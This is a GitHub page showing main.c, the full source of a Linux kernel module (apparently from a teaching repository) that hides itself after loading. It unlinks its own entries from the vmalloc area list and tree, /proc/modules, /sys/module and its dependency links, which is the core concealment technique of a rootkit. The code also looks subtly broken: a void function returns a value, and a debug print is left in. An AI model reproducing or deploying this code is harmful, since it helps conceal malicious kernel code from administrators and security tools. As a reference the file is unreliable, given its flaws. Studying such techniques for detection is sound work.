forked from sysprog21/lkm-hidden
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.c
76 lines (64 loc) · 2.09 KB
/
main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#include <linux/kallsyms.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 7, 0)
#define KPROBE_LOOKUP 1
#include <linux/kprobes.h>
static struct kprobe kp = {
.symbol_name = "kallsyms_lookup_name",
};
#endif
MODULE_LICENSE("GPL");
MODULE_AUTHOR("National Cheng Kung University, Taiwan");
MODULE_DESCRIPTION("Catch Me If You Can");
static void __init hide_myself(void)
{
struct vmap_area *va, *vtmp;
struct module_use *use, *tmp;
struct list_head *_vmap_area_list;
struct rb_root *_vmap_area_root;
#ifdef KPROBE_LOOKUP
unsigned long (*kallsyms_lookup_name)(const char *name);
int ret;
ret = register_kprobe(&kp);
if (ret < 0)
return ret;
kallsyms_lookup_name = (unsigned long (*)(const char *name)) kp.addr;
unregister_kprobe(&kp);
#endif
_vmap_area_list =
(struct list_head *) kallsyms_lookup_name("vmap_area_list");
_vmap_area_root = (struct rb_root *) kallsyms_lookup_name("vmap_area_root");
/* hidden from /proc/vmallocinfo */
list_for_each_entry_safe (va, vtmp, _vmap_area_list, list) {
if ((unsigned long) THIS_MODULE > va->va_start &&
(unsigned long) THIS_MODULE < va->va_end) {
list_del(&va->list);
/* remove from red-black tree */
rb_erase(&va->rb_node, _vmap_area_root);
}
}
/* hidden from /proc/modules */
list_del_init(&THIS_MODULE->list);
/* hidden from /sys/modules */
kobject_del(&THIS_MODULE->mkobj.kobj);
/* decouple the dependency */
list_for_each_entry_safe (use, tmp, &THIS_MODULE->target_list,
target_list) {
list_del(&use->source_list);
list_del(&use->target_list);
sysfs_remove_link(use->target->holders_dir, THIS_MODULE->name);
kfree(use);
}
}
static int __init hide_init(void)
{
hide_myself();
printk("this: %p", THIS_MODULE); /* TODO: remove this line */
return 0;
}
static void __exit hide_exit(void) {}
module_init(hide_init);
module_exit(hide_exit);